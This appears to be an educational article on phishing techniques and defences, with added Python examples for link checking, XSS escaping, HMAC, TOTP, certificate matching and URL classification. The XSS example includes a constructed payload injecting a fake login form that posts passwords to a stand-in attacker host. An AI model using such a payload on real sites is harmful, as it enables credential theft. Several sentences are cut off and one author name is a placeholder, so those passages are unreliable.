The term phishing was coined in the 1990s and was used to describe the act of sending fraudulent correspondence, such as phone calls or emails, to manipulate individuals into revealing personal information. The hacking tool AOHell is reported to contain the first recorded use of the term; it featured a phishing method for stealing the personal details of America Online (AOL) users. Over the years phishing attacks have increased in number as improving technologies have enabled phishers to apply their skills in new, previously unforeseen ways. The global impact of phishing has been shown to exceed $5 billion.
Increasing dependence on IT brings increased and unforeseen risks; the US Department of Defense regards cyberspace as the fifth battlefield, showing that information security is a fundamental requirement of today's society. Many IS threats currently exist in the form of malicious hackers or phishers. Attackers vary in the level of skill they display: some are opportunistic hackers who have fraudulently obtained a user's login credentials, other amateur hackers use pre-created software that assists with the process, while more skilled attackers may be career criminals, cyber terrorists or state-sponsored spies.
The number of security breaches has been shown to have increased dramatically as society's reliance on technology and interconnectivity progresses.
One of the major causes of these security breaches is a rise in the number of phishing attacks. Phishing is a method of obtaining an individual's personal information by exploiting weaknesses in both human psychology and technology, with a specific focus on the human aspect.
Why phish? Mainly because it is relatively easy in comparison to other hacking methods, as it directs its attacks at people rather than technology. Technology is ubiquitous in today's society; however, the knowledge behind the safe and effective use of these tools is not as prevalent, with many users vastly underestimating the level of threat to the safety of their personal information. Phishing is proving to be a very effective way of gaining access to
Modern phishers: their motivations, techniques and tools
The most sought-after types of information are those that can be used to recreate a person's identity, such as name, address and government ID numbers, usually as a tool to gain access to financial assets.
In order to gain access to an individual's personal details, phishing attacks very often employ social engineering tactics. Social engineering can be seen as an attempt to gain the trust of, and manipulate the behaviour of, another person, often via the creation of tools that assist in obtaining that individual's or organisation's private information or assets.
involves the sending of mass emails that contain some form of message intended to get the user to click a link, which usually redirects to a malicious web page designed to capture that user's information. These attacks vary in complexity, with some being very convincing representations of the web pages they
Phishing often involves the use of some form of malicious software, such as key loggers or screen loggers, that captures information being processed on a user's computer; this information can then be used to gain access to the user's personal information.
malware such as trojans. Using malicious software, attackers are able to perform various other attacks on the system; such malware can also remain on the user's system undetected, allowing further attacks in the future.
Phishing attacks can
present further problems by allowing the attacker to carry out attacks such as
session hijacking, host file
Types of phishing
Current phishing attacks can be perpetrated by an individual, or they can rely on teams of individuals working together. Studies performed by Ma (2017) have revealed a new trend of email phishing via multi-staged, cross-country teamwork. Ma (2017) states that "Understanding of the phishing process and these characteristics is very important to develop effective counter-measures to protect the information assets."
Generic phishing campaigns often consist of the mass sending of emails designed to emulate those of legitimate, established businesses. These emails usually request some form of verification of personal information and can also contain links that redirect the user to fraudulent web pages or cause malicious software to be downloaded onto the host system.
In contrast to the generic phishing campaign, where an attacker attempts to gain the information of a vast number of people, spear phishing attacks target fewer, more specific individuals. One specific form of spear phishing, known as whaling, refers to a campaign that focuses on high-value targets such as business executives. These attacks require a larger amount of time and skill, as they are crafted using information specific to the individual being targeted; spear phishing is shown to be the most successful form of phishing because it is supported by personal information that enhances the perceived authenticity of the attack. Finance, insurance and real estate are shown by Symantec (2016) to have made up the majority of spear phishing targets.
Spear phishing relies heavily on gaining information on a target via reconnaissance. One tool used to assist in this task, Maltego, uses open source intelligence (OSINT) to gather publicly available information on a target, such as email addresses, public profiles and publicly uploaded files.
Phishing uses link manipulation techniques to redirect users to fraudulent websites. Via emails designed to replicate those of a legitimate source, the attacker may include a link that appears identical to the legitimate website's; however, through tactics such as replacing an easily confused letter or number (a digit 1 for a lowercase l, a 0 for an o), or showing the legitimate address as the link text while the underlying href points elsewhere, they are able to redirect the user to a malicious website where they can attempt to harvest the user's personal information or perform further attacks.
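The two manipulations just described (visible link text that disagrees with the real href, and a host name that differs from a known brand by one confusable character) can both be checked mechanically. The following Python is an added example, not code from the original page; the allow-list of known domains, the confusable-character table and the sample email body are all constructed for illustration.

```python
"""Flag manipulated links in an HTML email body (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allow-list of brands the organisation expects mail from.
KNOWN_DOMAINS = {"paypal.com", "example-bank.com"}

# Characters phishers commonly swap for visually similar ones (assumed table).
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w"}


def registrable(host):
    """Rough registrable domain: the last two labels, or the literal for an IP address."""
    host = host.lower().rstrip(".")
    if host.replace(".", "").isdigit():
        return host
    return ".".join(host.split(".")[-2:])


def normalise(domain):
    """Undo confusable substitutions so 'paypa1.com' compares as 'paypal.com'."""
    for fake, real in CONFUSABLES.items():
        domain = domain.replace(fake, real)
    return domain


def edit_distance(a, b):
    """Levenshtein distance; one insertion, deletion or substitution costs 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain):
    """Return the known domain this one imitates, or None if it is itself known or unrelated."""
    if domain in KNOWN_DOMAINS:
        return None
    for known in KNOWN_DOMAINS:
        if normalise(domain) == known or edit_distance(domain, known) <= 1:
            return known
    return None


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def suspicious_links(html):
    """Return a list of (href, reason) for links that look manipulated."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        host = registrable(urlsplit(href).hostname or "")
        if "." in text:  # link text that itself looks like an address
            shown = urlsplit(text if "://" in text else "http://" + text).hostname or ""
            if registrable(shown) != host:
                findings.append((href, f"text shows {shown} but link goes to {host}"))
        target = lookalike_of(host)
        if target:
            findings.append((href, f"{host} imitates {target}"))
    return findings


# Constructed sample email body (not a real message); 203.0.113.9 is a documentation address.
SAMPLE = """
<p>Please <a href="http://paypa1.com/login">log in to PayPal</a> to verify.</p>
<p>Or visit <a href="http://203.0.113.9/x">www.paypal.com</a></p>
<p>Help: <a href="https://www.paypal.com/help">https://www.paypal.com/help</a></p>
"""

if __name__ == "__main__":
    for href, reason in suspicious_links(SAMPLE):
        print(f"{href}: {reason}")
```

The first link is caught by the confusable check, the second by the text/href mismatch, and the genuine help link produces no finding. A production filter would extend the confusable table to Unicode homoglyphs and use a public-suffix list instead of the two-label approximation.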
Website forgery attacks consist of an attacker exploiting flaws in a trusted website's scripts. These attacks, also known as cross-site scripting (XSS), involve the attacker injecting content into a trusted page so that the user is directed to enter their personal information into a fraudulent recreation of a web page, such as that of a financial institution, while the address bar still shows the legitimate domain. These attacks can be very difficult to spot without specialist knowledge; an attack of this kind against PayPal was reported in 2008.
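To make the forgery mechanism concrete, here is an added Python example (not from the page or from any real site) of a search handler that reflects user input: the vulnerable version lets an attacker-supplied query inject a fake login form into the trusted page, the hardened version escapes it, and a Content-Security-Policy `form-action` directive limits where any form can post even if escaping is missed. The payload and the `attacker.invalid` host are constructed for illustration.

```python
"""Reflected XSS used for website forgery: vulnerable rendering beside the escaped version (added example)."""
import html

# Constructed payload: an attacker-supplied search term that injects a fake login
# form posting to a host the attacker controls (.invalid is a reserved TLD).
PAYLOAD = ('<form action="http://attacker.invalid/steal">'
           'Session expired, please sign in: <input name="password"><input type="submit">'
           '</form>')


def render_vulnerable(query):
    """Echoes the query unescaped; the browser parses the injected form as part of the trusted page."""
    return f"<h1>Results for {query}</h1>"


def render_safe(query):
    """Escapes ampersand, angle brackets and both quote characters, so the payload is shown as text."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def security_headers():
    """Defence in depth: even if an injection slips through, forms may only post back to this origin."""
    return {"Content-Security-Policy": "default-src 'self'; form-action 'self'"}


def has_element(page, tag="form"):
    """Does the page contain a real <tag> element (as opposed to escaped text)?"""
    return f"<{tag}" in page.lower()


if __name__ == "__main__":
    print("vulnerable page contains a form:", has_element(render_vulnerable(PAYLOAD)))
    print("escaped page contains a form:   ", has_element(render_safe(PAYLOAD)))
```

Escaping on output is the primary fix; the CSP header is a second layer that turns a missed escape into a blocked submission rather than a credential theft.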
Web Based Delivery
Web based delivery is also known as "man-in-the-middle" phishing, because the phisher's system is situated between the user and the website the user intends to use, relaying traffic in both directions.
By using this technique an attacker can capture details during a transaction between the website and the user. The phisher is then able to monitor the connection and continue to log any details the user enters.
Social Engineering Toolkit
The Social Engineering Toolkit (SET) is open-source software that greatly simplifies many phishing attacks, such as mass email attacks. It focuses on the human element of penetration testing and was created as a means of simulating
Malicious USB tools have been shown to be a very effective way of exploiting the human aspect; it has been demonstrated that an unattended USB drive left in a public place has a high probability of being inserted into a computer by an unknowing individual. Once this has occurred the USB drive can be used to perform various attacks on a system. It phishes the user for their login and password once the user clicks on the files.
• 0-day attacks exploit vulnerabilities within USB drivers that enable an attacker to gain direct control of a system as soon as the USB device is plugged in.
• Social engineering attacks employ a USB drive that contains HTML files. Once a user clicks on one of the HTML files they are redirected to a malicious tool that attempts to steal their personal information such as usernames and
Human Interface Device (HID) spoofing
A USB device that emulates a keyboard and compromises the target's system by injecting keystroke commands as soon as it is inserted into the computer; because the operating system trusts any keyboard it enumerates, no driver exploit is needed.
Ransomware denies access to a device or files until a ransom has been paid. Ransomware for PCs is malware that can be installed on a user's workstation using a social engineering attack. The high level of harm that ransomware can cause was highlighted in 2017 when the WannaCry attack disabled the systems of major institutions globally, including healthcare. Although evidence shows that this example was not an instance of phishing (WannaCry spread as a network worm), it is still evidence of the harm that could be caused by a phisher with this tool.
A man-in-the-middle (MITM) phishing kit provides a simple UI that enables phishers to reproduce websites effectively and capture any login details a user enters.
Human and technological aspects of phishing attacks
Addressing the human aspect of phishing attacks through an individual's or organisation's information security culture
The practices and behaviours within an organisation that relate to the overall security of its information and assets are referred to as its information security culture (ISC). Niekerk & Solms (2010:479) state that "Many of the processes needed to protect these information assets are, to a large extent dependent on human cooperated behavior."
It has been shown that the average computer user has little to no concept of information security, with a large majority of people within organisations, including management, considering information security to be solely the responsibility of the IT department.
As the fundamental principle of phishing attacks is to exploit the human elements within a system, it is evident that the weak link in any system's information security is the individuals who interact with it, and that a strong ISC is a major factor in reducing the number of successful phishing
A strong ISC works to account for threats and vulnerabilities, mitigate risks and protect information assets to ensure the confidentiality, integrity and availability of information within a system. These three concepts form the CIA triad of information security, a conceptual framework that provides a method of evaluating and implementing information security. The CIA triad covers all aspects of security that phishers tend to exploit, and is therefore an important tool in any individual's or organisation's defence against phishing attacks.
The CIA triad is designed to be adaptable to a system's or organisation's specific security needs. The three concepts of the triad have specific requirements and
Confidentiality ensures that information within a system is only accessible to authorised personnel. Confidentiality can be achieved through methods such as policy-based security, user credentials such as IDs and passcodes, and access control lists (ACLs). Ensuring confidentiality within a system limits the information available to phishing attacks.
Integrity ensures that information within a system can only be edited by authorised personnel, making it much more difficult for an attacker to modify files within the system; in other words, integrity ensures that information within a system is genuine. Key processes that assist in providing integrity include cryptographic hashing together with message authentication codes or digital signatures (encryption on its own protects confidentiality rather than integrity, and an unkeyed hash can simply be recomputed by whoever altered the data). Many phishing attacks rely on the alteration of some information within a system, therefore ensuring integrity is a key factor in determining how vulnerable the system is to any form of attack.
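The difference between "hash only" and "keyed hash" integrity protection is easiest to see in code. The following is an added Python example, not from the page: it protects a constructed account record two ways and then simulates an attacker who can write to the data store but does not hold the key. The key value and the sample record are assumptions made for the demonstration.

```python
"""Integrity protection for a stored record: plain hash vs. keyed HMAC (added example)."""
import hashlib
import hmac
import json

# Assumption: the key lives outside the data store (secrets manager or HSM); demo value only.
SECRET_KEY = b"constructed-demo-key-not-for-production"


def canonical(record):
    """Serialise deterministically so equal records always produce identical bytes."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def hash_protect(record):
    """Unkeyed SHA-256 digest: detects accidental corruption, not deliberate modification."""
    body = canonical(record)
    return {"body": body.decode(), "digest": hashlib.sha256(body).hexdigest()}


def hash_verify(envelope):
    return hashlib.sha256(envelope["body"].encode()).hexdigest() == envelope["digest"]


def hmac_protect(record, key=SECRET_KEY):
    """Keyed HMAC-SHA256 tag: only a holder of the key can produce a valid tag."""
    body = canonical(record)
    return {"body": body.decode(), "tag": hmac.new(key, body, hashlib.sha256).hexdigest()}


def hmac_verify(envelope, key=SECRET_KEY):
    expected = hmac.new(key, envelope["body"].encode(), hashlib.sha256).hexdigest()
    # compare_digest runs in constant time, so the comparison leaks nothing about the tag.
    return hmac.compare_digest(expected, envelope["tag"])


def attacker_modifies(envelope, **changes):
    """Simulate an attacker with write access to the store but without SECRET_KEY."""
    record = json.loads(envelope["body"])
    record.update(changes)
    body = canonical(record)
    forged = {"body": body.decode()}
    if "digest" in envelope:
        forged["digest"] = hashlib.sha256(body).hexdigest()  # trivially recomputed
    else:
        forged["tag"] = envelope["tag"]  # best the attacker can do: keep the old tag
    return forged


# Constructed sample record (not real data).
ACCOUNT = {"user": "alice", "payout_iban": "GB00DEMO00000000000000", "role": "staff"}

if __name__ == "__main__":
    tampered_hash = attacker_modifies(hash_protect(ACCOUNT), role="admin")
    tampered_hmac = attacker_modifies(hmac_protect(ACCOUNT), role="admin")
    print("plain hash still verifies after tampering:", hash_verify(tampered_hash))
    print("HMAC still verifies after tampering:      ", hmac_verify(tampered_hmac))
```

The plain digest passes after tampering because the attacker recomputes it; the HMAC fails because the tag cannot be recomputed without the key. Digital signatures give the same guarantee when the verifier should not hold a shared secret.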
Availability ensures that information within a system is accessible when it is required. Methods of maintaining availability include software upgrades, software patching, hardware maintenance and network optimisation.
Human-based countermeasures and behavioural factors are significant in preventing phishing attacks. Therefore, to decrease the number of successful phishing attempts, it is important to consider how threats to the human aspect can best be mitigated.
Simulated phishing campaigns (SPCs), as part of IS management strategies, have been shown to assist with targeted training and to result in a greatly reduced number of monitored phishing click events. A simulated phishing campaign is one where the phishing is self-inflicted by the organisation as part of a staff IS training exercise: the organisation deploys a phishing email created in house and monitors the resulting click events, which then informs staff training and ensures that training is targeted at the staff who most require support.
Various software packages exist that assist with creating an SPC, such as PhishSim, AwareEd and SecurityIQ; these train users to better spot suspicious emails. Debate still exists over the best way to implement an SPC, as evidence has shown that repeated attempts can cause an organisation's staff to disregard future attempts and therefore increase security risks.
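What "monitor the resulting click events and target the training" looks like in practice is a small amount of log analysis. The following Python is an added example, not from the page or from any of the named products; the event log (two constructed campaigns across two departments) and the column names are assumptions made for the illustration.

```python
"""Analyse simulated phishing campaign events to target training (added example)."""
import csv
from collections import defaultdict
from io import StringIO

# Constructed event log: one row per recipient per campaign (hypothetical data).
EVENTS = """\
campaign,user,department,delivered,clicked,submitted,reported
2019-Q1,alice,finance,1,1,1,0
2019-Q1,bob,finance,1,1,0,0
2019-Q1,carol,engineering,1,0,0,1
2019-Q1,dave,engineering,1,0,0,0
2019-Q2,alice,finance,1,1,0,0
2019-Q2,bob,finance,1,0,0,1
2019-Q2,carol,engineering,1,0,0,1
2019-Q2,dave,engineering,1,1,0,0
"""

COUNTERS = ("delivered", "clicked", "submitted", "reported")


def load_events(text):
    """Parse the CSV log into a list of dicts (all values still strings)."""
    return list(csv.DictReader(StringIO(text)))


def rates_by(events, key):
    """Click, submit and report rate per value of `key` ('department', 'campaign', ...)."""
    totals = defaultdict(lambda: dict.fromkeys(COUNTERS, 0))
    for e in events:
        for field in COUNTERS:
            totals[e[key]][field] += int(e[field])
    return {
        k: {f: round(t[f] / t["delivered"], 2) for f in ("clicked", "submitted", "reported")}
        for k, t in totals.items()
    }


def repeat_clickers(events, min_clicks=2):
    """Users who clicked in at least `min_clicks` campaigns: the first group to retrain."""
    counts = defaultdict(int)
    for e in events:
        counts[e["user"]] += int(e["clicked"])
    return sorted(u for u, c in counts.items() if c >= min_clicks)


def training_targets(events):
    """Departments whose click rate exceeds their report rate: awareness training goes here first."""
    rates = rates_by(events, "department")
    return sorted(d for d, r in rates.items() if r["clicked"] > r["reported"])


if __name__ == "__main__":
    events = load_events(EVENTS)
    print("by department:", rates_by(events, "department"))
    print("by campaign:  ", rates_by(events, "campaign"))
    print("repeat clickers:", repeat_clickers(events))
    print("target departments:", training_targets(events))
```

Tracking the report rate alongside the click rate matters: a rising report rate is the signal that training is working, whereas a click rate alone cannot distinguish a wary workforce from one that has simply stopped paying attention to the exercises.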
A variety of factors have been found to affect human security awareness, including experiential factors such as a user's security knowledge, web experience and computer self-efficacy, and dispositional factors such as a user's disposition to trust, perceived risk and suspicion of humanity.
An information security management system (ISMS) is used to minimise the risk to an organisation's information assets that may arise through a security breach. An effective ISMS governs the policies, procedures and strategies needed to ensure the security of information assets.
Addressing the technological aspect of phishing
Multi-factor authentication
Authentication is a function of some combination of something you have, such as an ID token, something you know, such as a password, and something you are, for example a biometric. Along with a username and password, multi-factor authentication systems require the user to present a separate form of authentication from a different category, such as a one-time code generated by a token or app, or a fingerprint (a PIN is another "something you know" and so does not add a factor). Two-step verification has been provided by companies such as Google; however, a recent phishing attack that affected
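The one-time code most two-step systems use is a time-based HOTP (RFC 4226 / RFC 6238): an HMAC over a counter derived from the clock, truncated to six digits. The Python below is an added example of both sides of that scheme, not code from the page or from any vendor; it uses the reference secret published in the RFCs, and the replay-protection rule (never accept a counter at or below the last accepted one) is a design choice of this example.

```python
"""HOTP/TOTP one-time codes (RFC 4226 / RFC 6238) with replay protection (added example)."""
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6, digestmod=hashlib.sha1):
    """RFC 4226: HMAC over the 8-byte big-endian counter, dynamically truncated to `digits`."""
    mac = hmac.new(secret, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, for_time=None, step=30, digits=6):
    """RFC 6238: HOTP with the counter taken as Unix time divided by the time step."""
    t = int(time.time() if for_time is None else for_time)
    return hotp(secret, t // step, digits)


def verify_totp(secret, code, for_time=None, step=30, window=1, last_counter=-1):
    """Accept codes from the current step and +/- `window` steps (clock drift), but never
    a counter at or below the last accepted one, so a code captured by a phisher cannot
    be submitted a second time. Returns the accepted counter, or None."""
    t = int(time.time() if for_time is None else for_time)
    current = t // step
    for k in range(-window, window + 1):
        counter = current + k
        if counter <= last_counter:
            continue
        # compare_digest avoids leaking how many leading digits matched via timing.
        if hmac.compare_digest(hotp(secret, counter, len(code)), code):
            return counter
    return None


# Reference secret from RFC 4226 / RFC 6238 test vectors (ASCII "12345678901234567890"); not a real key.
RFC_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    print(totp(RFC_SECRET, for_time=59))  # RFC 6238 SHA-1 vector: 287082
    print(verify_totp(RFC_SECRET, "287082", for_time=59))  # accepted at counter 1
    print(verify_totp(RFC_SECRET, "287082", for_time=59, last_counter=1))  # replay: None
```

The replay check only helps against a code reused later. A man-in-the-middle phishing kit that relays the victim's code to the real site within the same 30-second step is not stopped by TOTP at all; that is why origin-bound authenticators, which sign the site's real origin, resist this class of attack where one-time codes do not.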
solutions make use of established pattern-recognition and blacklisting approaches, but they are not expected to be fully effective on their own and are widely seen as components of an integrated solution. Digital certificates, on the other hand, are designed to provide an effective whitelist of assured identities. There is also a clear synergy between the roles of certification authorities and traditional trusted third parties such as banks, auditors and online business information providers, which means that existing certification services can readily be leveraged to provide the consumer with evidence of legitimacy and good standing in addition to mere identity.
Most sites have a server certificate, also called an SSL/TLS certificate, which is signed by a trusted third-party certificate provider (a certificate authority, CA). Your browser has a built-in list of trusted CAs, and if the site you open presents a certificate that chains to one of these CAs and whose name matches the host in the address bar, the browser accepts the site's identity. Note that this proves only who controls the domain name, not that the site is safe. Phishing sites cannot obtain a valid certificate for the legitimate site's domain name, because a CA will only issue a certificate for a domain the applicant controls; checking that the name on the certificate is the domain you expect is therefore one of the easiest ways to find a site which is built
It should be noted that many companies do not obtain a CA-signed certificate for their own internal websites, and your browser may show a warning when you access such sites. If you know the site is safe you could ignore this warning, but the better practice is for the organisation to distribute its internal CA certificate to the trust store of its managed devices, since habitually clicking through certificate warnings is exactly the behaviour a phisher relies on.
I believe some browsers can check the URL as well and identify URLs which look fake. Not sure about this though.
The average HTTP website runs over port 80, whereas the secure version, HTTPS, runs over port 443. Using HTTPS means that the information passed between the browser and the intended server is encrypted, hence the added S for secure; but visiting an HTTPS website alone does not give 100% protection. A phisher can set up a phishing site using HTTPS, since a certificate for a lookalike domain the phisher registered is just as valid as any other. The best way to help determine the legitimacy of the site is to verify the certificate details, in particular that the name on the certificate is the domain you expect. A legitimate site would have a certificate issued by a reputable and trusted
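"Verify the certificate details" means, concretely, checking the names the certificate carries against the host you intended to reach. The following Python is an added example, not from the page: it implements the host-name matching rules browsers apply to a certificate's Subject Alternative Names (exact match, or a wildcard that is the whole leftmost label and covers exactly one label) and runs them over two constructed certificates, one for the genuine domain and one perfectly valid certificate for a lookalike domain. The certificate dictionaries follow the shape Python's `ssl` module returns from `getpeercert()`, but are constructed here, not fetched.

```python
"""Host-name matching against a certificate's names, RFC 6125 style (added example)."""
import ipaddress


def name_matches(pattern, host):
    """Does one certificate DNS name (possibly a wildcard) cover `host`?"""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    p_labels, h_labels = pattern.split("."), host.split(".")
    if "*" not in pattern:
        return p_labels == h_labels
    # Wildcard must be the entire leftmost label and leave at least two fixed labels,
    # so '*.paypal.com' is fine but '*.com' and 'w*.paypal.com' are rejected.
    if p_labels[0] != "*" or len(p_labels) < 3 or any("*" in l for l in p_labels[1:]):
        return False
    # A wildcard matches exactly one label: '*.paypal.com' does not cover 'a.b.paypal.com'.
    return len(h_labels) == len(p_labels) and h_labels[1:] == p_labels[1:]


def cert_matches_host(cert, host):
    """Check subjectAltName entries only; the Common Name is ignored, as modern browsers do."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    for kind, value in cert.get("subjectAltName", ()):
        if ip is not None and kind == "IP Address" and ipaddress.ip_address(value) == ip:
            return True
        if ip is None and kind == "DNS" and name_matches(value, host):
            return True
    return False


def explain(cert, host):
    """Human-readable verdict of the kind a browser shows when the name does not match."""
    names = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if cert_matches_host(cert, host):
        return f"{host}: certificate name matches"
    return f"{host}: certificate is for {', '.join(names)}, not for this host"


# Constructed certificates (shape of ssl.SSLSocket.getpeercert(); not real certificates).
LEGIT_CERT = {
    "subject": ((("commonName", "www.paypal.com"),),),
    "subjectAltName": (("DNS", "www.paypal.com"), ("DNS", "*.paypal.com")),
}
LOOKALIKE_CERT = {  # a CA will happily issue this to whoever controls paypa1.com
    "subject": ((("commonName", "paypa1.com"),),),
    "subjectAltName": (("DNS", "paypa1.com"), ("DNS", "www.paypa1.com")),
}

if __name__ == "__main__":
    print(explain(LEGIT_CERT, "www.paypal.com"))
    print(explain(LEGIT_CERT, "login.paypal.com"))
    print(explain(LOOKALIKE_CERT, "www.paypa1.com"))
    print(explain(LOOKALIKE_CERT, "www.paypal.com"))
```

The last two lines are the point: the lookalike certificate is valid and matches the lookalike host, so the browser shows a padlock; it only fails when checked against the name the user meant to visit, which is a check the user, not the browser, has to make.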
Properly Configured Web Browser
Most browsers now come equipped with tools to help prevent navigating to phishing sites, such as verification of a website's authenticity against a list of reported sites, alerts when sites try to install add-ons, and the ability to block reported attack sites and block reported web
Monitoring Phishing Sites
Microsoft and other organisations keep a running list of reported sites. There are also online tools that can be used to check a site before navigating to it; Google Safe Browsing is one of the popular online
Proper Email Client Configuration
It has been shown that, whether in an organisational or residential setting, good IS is a systemic issue that relies on the knowledge and skills of all involved. Even though the end user is not usually responsible for configuring an email server, the user is part of the security process, as it is within their ability to ensure that the email client they use processes emails in a secure manner. As there are many options available to end users, it is important to consider the security features of the chosen email client. Many email clients, such as Microsoft Outlook, offer phishing protection and spam filters designed to protect the end user from malicious content. Therefore it is the user's responsibility to ensure they are familiar with these options and have a good working knowledge of how these features are effectively
Anti-phishing software works in a simple way, whether it is integrated into the web browser or runs as standalone software: it stores lists of common phishing scams and phishing sites and uses them to alert the user if they stumble upon a potentially dangerous site. In the case of a browser-based program, an alert may pop up at the top of the browser window; in the case of standalone software, an alert may pop up at the bottom of the user's screen. Some can also block websites and redirect requests for certain websites to other sites.
Phishing detection model
The authors of PhiDMA have developed a model which detects phishing sites with a multi-filter approach and provides hints regarding the actual site the user is attempting to visit. Each layer in this model (auto-upgrade whitelist layer, URL features layer, lexical signature layer, string matching layer and accessibility score comparison layer) acts as a filter to detect phishing using a
PhiDMA aims to address the lack of specific knowledge displayed by many end users by making the UI as accessible as possible, even for those with visual impairments. From their experiments, xxxx were able to demonstrate results showing that "the model could detect phishing sites successfully and the evaluated accuracy 92.72%". In comparison with other approaches, it is evident that this model results in preferable accuracy than
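To show how a layered filter of this kind short-circuits and produces a "hint" about the intended site, here is an added Python example in the spirit of the whitelist, URL-features and string-matching layers. It is not PhiDMA's code (which is not on the page) and omits the lexical-signature and accessibility-score layers; the whitelist, brand table, feature thresholds and sample URLs are all constructed for illustration.

```python
"""Layered phishing-URL filter: whitelist, URL features, brand string matching (added example)."""
import re
from urllib.parse import urlsplit

# Constructed whitelist of registrable domains and the brands each one owns.
WHITELIST = {"paypal.com", "example-bank.com", "google.com"}
BRANDS = {"paypal": "paypal.com", "google": "google.com", "example-bank": "example-bank.com"}
CREDENTIAL_WORDS = ("login", "signin", "verify", "account")


def registrable(host):
    """Rough registrable domain: the last two labels, or the literal for an IP address."""
    host = host.lower().rstrip(".")
    if host.replace(".", "").isdigit():
        return host
    return ".".join(host.split(".")[-2:])


def whitelist_layer(url):
    """Layer 1: known-good domains pass immediately."""
    return registrable(urlsplit(url).hostname or "") in WHITELIST


def url_feature_layer(url):
    """Layer 2: structural features that legitimate sites rarely have; returns the hits."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    hits = []
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        hits.append("ip-address host")
    if "@" in parts.netloc:
        hits.append("userinfo '@' hides the real host")
    if host.count(".") >= 4:
        hits.append("many subdomains")
    if len(url) > 75:
        hits.append("long url")
    if parts.scheme == "http" and any(w in parts.path.lower() for w in CREDENTIAL_WORDS):
        hits.append("credential page without https")
    return hits


def string_match_layer(url):
    """Layer 3: a brand name in the URL whose registrable domain is not that brand's.
    Returns the brand's real domain as the hint about where the user meant to go."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    reg = registrable(host)
    text = (host + parts.path).lower()
    for brand, real_domain in BRANDS.items():
        if brand in text and reg != real_domain:
            return real_domain
    return None


def classify(url):
    """Run the layers in order; whitelisted URLs skip the remaining filters."""
    if whitelist_layer(url):
        return {"verdict": "legitimate", "reasons": [], "hint": None}
    reasons = url_feature_layer(url)
    hint = string_match_layer(url)
    if hint:
        reasons.append(f"mentions the brand of {hint}")
    return {"verdict": "phishing" if reasons else "unknown", "reasons": reasons, "hint": hint}


# Constructed sample URLs (203.0.113.9 and .test/.example names are reserved for documentation).
SAMPLES = [
    "https://www.paypal.com/signin",
    "http://paypal.com.secure-login.example.net/verify",
    "http://203.0.113.9/google/login",
    "http://user@example-bank.com.evil.test/x",
    "https://blog.unrelated.org/post",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", classify(url))
```

The "unknown" verdict for the last sample is deliberate: a filter that has no whitelist entry and sees no suspicious feature should hand the URL on to the next layer (or to a reputation service), not declare it safe.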
Tracking Phishing Attacks Over Time
Alamgirkhan, A. (2013). Preventing Phishing Attacks using One Time Password and User Machine Identification. International Journal of Computer Applications, 68(3), pp. 7-11.
Aleroud, A. and Zhou, L. (2017). Phishing environments, techniques, and countermeasures: A survey. Computers & Security, 68, pp. 160-196.
Dakpa, T. and Augustine, P. (2017). Study of Phishing Attacks and Preventions. International Journal of Computer Applications, 163(2),
Ma, Q., Durcikova, A. and Wright, R. T. (2017). Combatting Phishing Attacks: A Knowledge Management Approach. Proceedings of the 50th Hawaii International Conference